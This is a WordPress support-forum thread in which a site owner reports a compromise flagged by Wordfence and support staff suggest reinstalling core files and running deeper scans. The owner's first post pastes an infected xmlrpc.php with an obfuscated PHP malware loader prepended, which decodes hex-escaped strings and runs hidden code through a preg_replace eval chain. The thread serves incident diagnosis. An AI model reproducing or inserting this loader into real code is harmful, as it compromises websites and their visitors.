Core WordPress Files

  • trevorbranton

    (@trevorbranton)


    11 years, 3 months ago

    Following my earlier message to support, and directed here by wordfence… My site seems to have been compromised.

    I have used WordFence to repair/correct the core files, but after changing 400 or so of them (no more than 30 or so at a time) its come up with the same issue and suggesting to replace the original file AGAIN.

    There is obviously something not working or a problem and I wonder if anyone can assist.

    Here is a DUMP of the Data in the first of the many files.

    THANKS! 🙂

    <?php if(!isset($GLOBALS[“\x61\156\x75\156\x61”])) { $ua=strtolower($_SERVER[“\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54″]); if ((! strstr($ua,”\x6d\163\x69\145″)) and (! strstr($ua,”\x72\166\x3a\61\x31”))) $GLOBALS[“\x61\156\x75\156\x61″]=1; } ?><?php $vlpnmfvooy = ‘A%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4<**qp%x5c%x7825!-uyfu%x5c%x<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbqc%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]bT-%x5c%x7825bT-%x5c%x7825hW~5c%x7825>5h%x5c%x7825!<*::::::-1111*-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5ccotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqn5ww2)%x5c%x7825w%x5c%x7860TW7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssx7824*!|!%x5c%x7824-%x5c%x7824%x5%x5c%x7825!*##>>X)!gjZ54l}%x5c%x7827;%x5c%&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudov5)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvpp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]yc%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%x5]65]y31]53]y6d]281]y43]78]y3]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y765c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSx7825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x52]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Y%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Q%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x7D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55!#]y81]273]y76]258]y6g]273]y76ojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)!%x5c%x7825b:>1<!fmtf!%x5c%x7825x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x73]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73″,x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%5c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%xc%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f2vufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7860439mjg}[;ldpt%x5c%x7825}K;%x5c%xx5c%x7825eN+#Qi%x5c%x785mjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c2%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y7%x787f<*XAZASV<*w%x5c%x7825)ppde>946-tr.984:75983:48984:71]K9]77]D4]8%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!bqov>*ofmy%x5c%x7825)utjm!|!*5bmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%7gj6<.[A%x5c%x7827&6<%x5c%xdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825b61%156%x75%156%x61”]=1; function fjfgg($n){return5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%7,*e%x5c%x7827,*d%x5c%x782ce(“%x2f%50%x2e%52%x29%57%x65″,”%x65bek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>bu%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U#00;quui#>.%x5c%x7825!<***f%x5c%x782 chr(ord($n)-1);} @error_reporting(0); preg_repla5V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5cc%x7825%x5c%x787f!~!<##!>!2p%x<%x5c%x787fw6<*K)ftpmdXA#g6R85,67R37,18R#>q%x5w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6878;0]=])0#)U!%x5c%x%152%x66%147%x67%42%x2c%163%x74%16Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x5c%x787f!|!*uyfu%x5c%8}527}88:}334}472%x5c%x7824<!%x5c%x7825c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x782567825!*72!%x5c%x7827!hmg%x5c%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]0QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78s:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:mA%x5c%x78273qj%x5c%x78256<*Y%x5c%x78225zB%x5c%x7825z>!tussfw)c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%xx785cq%x5c%x7825%x5c%x7827jsv%x5c%UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323z7825)3of)fepdof%x5c%x786057ftb?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y7x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x782tpz)#]341]88M4P8]37]278]225]2415mm!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bss~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%{h%x5c%x7825)sutcvt-#w#)ld%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x77&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7b:>%x5c%x7825s:%x5c%x785c%x5cx5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6g5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!27860ufldpt}X;%x5c%x7860msvd}R;y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x782x7825%x5c%x7878:-!%x5c%x7825tzwx7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x2]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]Dp%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7827{**u%x5c%x7825-#jt0}Z;0bz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6x7878W~!Ypp2)%x5c%x78x5c%x785cSFWSFT%x5c%x7860%r#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%5c%x78257**^#zsfvr#%x5787fw6*%x5c%x787f_*#[k2%x5c%x7860{6787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7g%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x55r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x0sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujc%x7825w%x5c%x7860%x5c%x785c^>Ew:4<%x5c%x7825j,,*!|%x5c%x7824-%#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<12)eobs%x5c%x7860un>qp%x5c%x7825!|Zx787f%x5c%x787f<u%x5c%x7825c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%xx7825z<jg!)%x5c%x7825z>>2*!%x5c%x77,*c%x5c%x7827,*b%x5c%x782svufs}%x5c%x7827;mnui}&7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x782Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825f!%x5c%x7827!hmg%x5c%]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5]277#<%x5c%x7825t2w>6|7**197-2qj%x5c%x78257-K)udfoo825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x782pdXA%x5c%x7822)7gj6<*QDU%x5c%x7860Mopd%x5c%x7860ufh%x5c%x7860fj!%x5c%x782f!#0#)idubn%x5c%xx7825!<*#}_;#)323ldfidc%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x786*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#kZ6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782fFGFS%x5c%x7860QUUI&c_g!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%vso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9*%156%x75%156%x61”])))) { $GLOBALS[“%x NULL); }*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x786<*msv%x5c%x78257-MSV,6<*)782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x}V;3q%x5c%x7825}U;y]}R;2]},;ox7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c297e:56-%x5c%x7878r.985:52985-t.98]K4]65]7824<!%x5c%x7825o:!>!%x5c%x7824217x5c%x7825)Rd%x5c%x7825)Rb%x5c%x%x782fh%x5c%x7825)n%c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x782if((function_exists(“%x6f%142%x5f%163%x74%141%x72%164”) && (!256<%x5c%x787fw6*%x5c%x787f_*#f]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y8385c%x5c%x7825j:^<!%x55c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvuf]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y335c%x7825-bubE{h%x5c%x7825)sutcvt)fu%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x23}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudo%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upPT7-NBFSUT%x5c%x7860LDPT7-UFOJ>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osx7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmx78256<C>^#zsfvr#%x5c%x785cq%xj6<*doj%x5c%x78257-C)fepmqnj6]277]y72]265]y39]271]y83]25625!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x78255kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825%x5c%x7825)323ldfidk!~!7)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x]83]238M7]381]211M5]67]452]8c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)8]24]31#-%x5c%x7825tdz*Wsfu31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:582f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)vg+)!gj+{e%x5c%x7825!osvufs!<.msv%x5c%x7860ftsbqc%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%xj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubEbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x8]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf825rN}#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x78<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%x66825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-Kc%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=t%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f0msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5g%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5cx5c%x7824gvodujpo!%x5c%x7824-%x]334]368]322]3]364]6]283]427]36]373P6]36]73A7>q%x5c%x78256<%x5c%x787fw6*%x5c%x:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofub%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x782%x7825:|:**t%x5c%x7825)m%x5)fujs%x5c%x7878X6<#o]o]Y%x57822#)fepmqyfA>2b%x5c%x78%x5c%x782f%x5c%x7824)82#-#!#-%x5c%x7825tmw)%x5c%xisset($GLOBALS[“%x61/(.*)/epreg_replacebbwjfhcczl’; $qiuxuovmsn = explode(chr((162-118)),’7582,61,10086,20,7052,37,2450,49,2746,49,2563,36,1765,46,9358,49,2993,34,2043,52,310,53,3325,36,9910,48,2915,58,6694,65,4711,45,3027,46,4977,59,4083,46,757,44,4015,39,9407,52,9985,27,1811,57,3275,50,2870,24,6418,31,6486,35,8050,30,3073,37,1037,42,41,44,3417,38,871,44,4803,62,3528,34,8202,30,4865,22,8929,45,3172,41,8909,20,9842,35,4922,55,8232,28,0,41,7643,31,1985,58,5228,63,5101,63,7163,25,5618,57,1495,43,2377,27,4887,35,9877,33,6521,27,1932,29,4253,30,7098,65,9558,58,5471,41,7248,69,553,69,7858,35,2311,66,4445,64,3213,28,4384,61,8700,34,9029,68,3925,26,2281,30,6239,20,8132,70,9654,44,801,70,6822,63,2840,30,4215,38,4552,67,10012,25,8289,67,9505,53,2710,36,2537,26,6077,26,8594,44,392,35,5874,35,9698,70,8002,48,489,36,6548,28,5036,65,7490,31,622,60,9097,31,1170,41,6801,21,3562,54,2599,52,715,22,152,50,8571,23,125,27,3616,30,3110,24,1674,33,4777,26,1570,40,8823,58,737,20,6576,22,8080,52,1868,64,5164,64,6126,51,7948,54,8881,28,6647,47,5776,45,5909,26,2795,45,2156,33,2651,59,5821,53,2894,21,5935,58,2225,56,7317,29,6103,23,8476,57,2973,20,4619,27,6259,62,271,39,3646,58,8407,69,7674,48,1107,63,6398,20,5512,66,7743,58,3361,56,9300,58,7521,20,6321,34,9958,27,5291,59,202,69,7346,69,7893,55,7456,34,3134,38,3800,45,3845,32,4646,65,682,33,3479,49,2499,38,1211,45,6598,49,5578,40,4283,70,5708,30,9768,31,4129,38,9616,38,9186,58,5350,61,7541,41,8356,51,1256,42,915,53,1961,24,8666,34,3704,65,5411,60,4756,21,3455,24,3951,64,9244,56,1707,58,10058,28,968,69,8761,62,7415,41,1410,55,2189,36,4509,43,6759,42,4167,48,85,40,8533,38,3241,34,6177,62,2404,46,363,29,1298,54,3769,31,9799,43,8638,28,9128,58,8734,27,6988,64,427,62,6355,43,9459,46,8974,55,1538,32,4054,29,1352,58,7722,21,5675,33,6885,35,6920,68,6043,34,6449,37,525,28,3877,48,4353,31,10037,21,5738,38,5993,50,7188,60,1465,30,2095,61,8260,29,7801,57,1079,28,1610,64,7089,9′); $nsrqmcsdgz=substr($vlpnmfvooy,(49559-39453),(46-39)); if (!function_exists(‘hefncolnia’)) { function hefncolnia($deqekmywub, $mblwsexxip) { $iufnixgwly = NULL; for($wxewfaqadj=0;$wxewfaqadj<(sizeof($deqekmywub)/2);$wxewfaqadj++) { $iufnixgwly .= substr($mblwsexxip, $deqekmywub[($wxewfaqadj*2)],$deqekmywub[($wxewfaqadj*2)+1]); } return $iufnixgwly; };} $pcyogishpq=”\x20\57\x2a\40\x73\145\x66\150\x65\163\x6c\162\x74\162\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x31\55\x31\71\x34\51\x29\54\x20\143\x68\162\x28\50\x34\70\x34\55\x33\71\x32\51\x29\54\x20\150\x65\146\x6e\143\x6f\154\x6e\151\x61\50\x24\161\x69\165\x78\165\x6f\166\x6d\163\x6e\54\x24\166\x6c\160\x6e\155\x66\166\x6f\157\x79\51\x29\51\x3b\40\x2f\52\x20\147\x72\152\x73\166\x64\161\x67\154\x71\40\x2a\57\x20”; $hwsifblrhw=substr($vlpnmfvooy,(57959-47846),(39-27)); $hwsifblrhw($nsrqmcsdgz, $pcyogishpq, NULL); $hwsifblrhw=$pcyogishpq; $hwsifblrhw=(460-339); $vlpnmfvooy=$hwsifblrhw-1; ?><?php
    /**
    * XML-RPC protocol support for WordPress
    *
    * @package WordPress
    */

    /**
    * Whether this is an XML-RPC Request
    *
    * @var bool
    */
    define(‘XMLRPC_REQUEST’, true);

    // Some browser-embedded clients send cookies. We don’t want them.
    $_COOKIE = array();

    // A bug in PHP < 5.2.2 makes $HTTP_RAW_POST_DATA not set by default,
    // but we can do it ourself.
    if ( !isset( $HTTP_RAW_POST_DATA ) ) {
    $HTTP_RAW_POST_DATA = file_get_contents( ‘php://input’ );
    }

    // fix for mozBlog and other cases where ‘<?xml’ isn’t on the very first line
    if ( isset($HTTP_RAW_POST_DATA) )
    $HTTP_RAW_POST_DATA = trim($HTTP_RAW_POST_DATA);

    /** Include the bootstrap for setting up WordPress environment */
    include(‘./wp-load.php’);

    if ( isset( $_GET[‘rsd’] ) ) { // http://cyber.law.harvard.edu/blogs/gems/tech/rsd.html
    header(‘Content-Type: text/xml; charset=’ . get_option(‘blog_charset’), true);
    ?>
    <?php echo ‘<?xml version=”1.0″ encoding=”‘.get_option(‘blog_charset’).'”?’.’>’; ?>
    <rsd version=”1.0″ xmlns=”http://archipelago.phrasewise.com/rsd”&gt;
    <service>
    <engineName>WordPress</engineName>
    <engineLink>http://wordpress.org/</engineLink&gt;
    <homePageLink><?php bloginfo_rss(‘url’) ?></homePageLink>
    <apis>
    <api name=”WordPress” blogID=”1″ preferred=”true” apiLink=”<?php echo site_url(‘xmlrpc.php’, ‘rpc’) ?>” />
    <api name=”Movable Type” blogID=”1″ preferred=”false” apiLink=”<?php echo site_url(‘xmlrpc.php’, ‘rpc’) ?>” />
    <api name=”MetaWeblog” blogID=”1″ preferred=”false” apiLink=”<?php echo site_url(‘xmlrpc.php’, ‘rpc’) ?>” />
    <api name=”Blogger” blogID=”1″ preferred=”false” apiLink=”<?php echo site_url(‘xmlrpc.php’, ‘rpc’) ?>” />
    <?php
    /**
    * Add additional APIs to the Really Simple Discovery (RSD) endpoint.
    *
    * @link http://cyber.law.harvard.edu/blogs/gems/tech/rsd.html
    *
    * @since 3.5.0
    */
    do_action( ‘xmlrpc_rsd_apis’ );
    ?>
    </apis>
    </service>
    </rsd>
    <?php
    exit;
    }

    include_once(ABSPATH . ‘wp-admin/includes/admin.php’);
    include_once(ABSPATH . WPINC . ‘/class-IXR.php’);
    include_once(ABSPATH . WPINC . ‘/class-wp-xmlrpc-server.php’);

    /**
    * Posts submitted via the XML-RPC interface get that title
    * @name post_default_title
    * @var string
    */
    $post_default_title = “”;

    /**
    * Filter the class used for handling XML-RPC requests.
    *
    * @since 3.1.0
    *
    * @param string $class The name of the XML-RPC server class.
    */
    $wp_xmlrpc_server_class = apply_filters( ‘wp_xmlrpc_server_class’, ‘wp_xmlrpc_server’ );
    $wp_xmlrpc_server = new $wp_xmlrpc_server_class;

    // Fire off the request
    $wp_xmlrpc_server->serve_request();

    exit;

    /**
    * logIO() – Writes logging info to a file.
    *
    * @deprecated 3.4.0
    * @deprecated Use error_log()
    *
    * @param string $io Whether input or output
    * @param string $msg Information describing logging reason.
    */
    function logIO( $io, $msg ) {
    _deprecated_function( __FUNCTION__, ‘3.4’, ‘error_log()’ );
    if ( ! empty( $GLOBALS[‘xmlrpc_logging’] ) )
    error_log( $io . ‘ – ‘ . $msg );
    }

    https://wordpress.org/plugins/wordfence/

Viewing 3 replies - 1 through 3 (of 3 total)
  • WFSupport

    (@wfsupport)

    11 years, 3 months ago

    So is that in every file, some of them, or just one?
    Also, if these are core wordpress files being changed I highly recommend heading to the update section o0f your admin and reinstalling wordpress. I’d run scans with the “scan images as executable option”, get rid of any themes or plugins you are not using (with exception of the twenty* themes wordpress includes), and update all the rest.

    Next run a scan with “Enable HIGH SENSITIVITY scanning. May give false positives” checked on the options page and report back what this turns up.

    tim

    Thread Starter trevorbranton

    (@trevorbranton)

    11 years, 3 months ago

    These are the files alerted to me by your system by email :

    * WordPress core file modified: wp-includes/Text/Diff/Engine/native.php
    * WordPress core file modified: wp-includes/Text/Diff/Engine/shell.php
    * WordPress core file modified: wp-includes/Text/Diff/Engine/string.php
    * WordPress core file modified: wp-includes/Text/Diff/Engine/xdiff.php
    * WordPress core file modified: wp-includes/Text/Diff/Renderer/inline.php
    * WordPress core file modified: wp-includes/Text/Diff/Renderer.php
    * WordPress core file modified: wp-includes/Text/Diff.php
    * WordPress core file modified: wp-includes/atomlib.php
    * WordPress core file modified: wp-includes/bookmark-template.php
    * WordPress core file modified: wp-includes/bookmark.php
    * WordPress core file modified: wp-includes/class-http.php
    * WordPress core file modified: wp-includes/class-phpmailer.php
    * WordPress core file modified: wp-includes/class-pop3.php
    * WordPress core file modified: wp-includes/class-smtp.php
    * WordPress core file modified: wp-includes/class-snoopy.php
    * WordPress core file modified: wp-includes/class-wp-ajax-response.php
    * WordPress core file modified: wp-includes/class-wp-customize-control.php
    * WordPress core file modified: wp-includes/class-wp-customize-section.php
    * WordPress core file modified: wp-includes/class-wp-http-ixr-client.php
    * WordPress core file modified: wp-includes/class-wp-image-editor-imagick.php
    * WordPress core file modified: wp-includes/class-wp-image-editor.php
    * WordPress core file modified: wp-includes/class-wp-xmlrpc-server.php
    * WordPress core file modified: wp-includes/class.wp-scripts.php
    * WordPress core file modified: wp-includes/class.wp-styles.php
    * WordPress core file modified: wp-includes/comment-template.php
    * WordPress core file modified: wp-includes/date.php
    * WordPress core file modified: wp-includes/functions.wp-scripts.php
    * WordPress core file modified: wp-includes/js/tinymce/wp-mce-help.php
    * WordPress core file modified: wp-includes/js/tinymce/wp-tinymce.php
    * WordPress core file modified: wp-includes/link-template.php
    * WordPress core file modified: wp-includes/locale.php
    * WordPress core file modified: wp-includes/ms-blogs.php
    * WordPress core file modified: wp-includes/ms-default-constants.php
    * WordPress core file modified: wp-includes/ms-default-filters.php
    * WordPress core file modified: wp-includes/ms-files.php
    * WordPress core file modified: wp-includes/ms-functions.php
    * WordPress core file modified: wp-includes/ms-load.php
    * WordPress core file modified: wp-includes/nav-menu-template.php
    * WordPress core file modified: wp-includes/nav-menu.php
    * WordPress core file modified: wp-includes/option.php
    * WordPress core file modified: wp-includes/pluggable-deprecated.php
    * WordPress core file modified: wp-includes/pluggable.php
    * WordPress core file modified: wp-includes/plugin.php
    * WordPress core file modified: wp-includes/post-thumbnail-template.php
    * WordPress core file modified: wp-includes/registration-functions.php
    * WordPress core file modified: wp-includes/rss.php
    * WordPress core file modified: wp-includes/shortcodes.php
    * WordPress core file modified: wp-includes/template-loader.php
    * WordPress core file modified: wp-includes/wp-diff.php

    Other files include:

    index.php
    wp-activate.php
    wp-admin/admin-ajax.php
    etc

    In total there are 371 that are shown as an error. All of them have the similar malicious code within… I am running a scan with the suggestions as said above and will advise of progress.

    The frustration is that you cant bulk fix as you can only do 20 or 30 at a time (full selection crashes) and you have to individually click each box 🙁

    Thanks

    WFSupport

    (@wfsupport)

    11 years, 3 months ago

    If that happens, you might try adjusting the max execution time on the options page. Often a server will kill long running scripts. This setting tells wordfence to break up the scan into pieces, allowing the scans to stop, then restart where they left off.

    http://docs.wordfence.com/en/Wordfence_options#Maximum_execution_time_for_each_scan_stage

    tim

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Core WordPress Files’ is closed to new replies.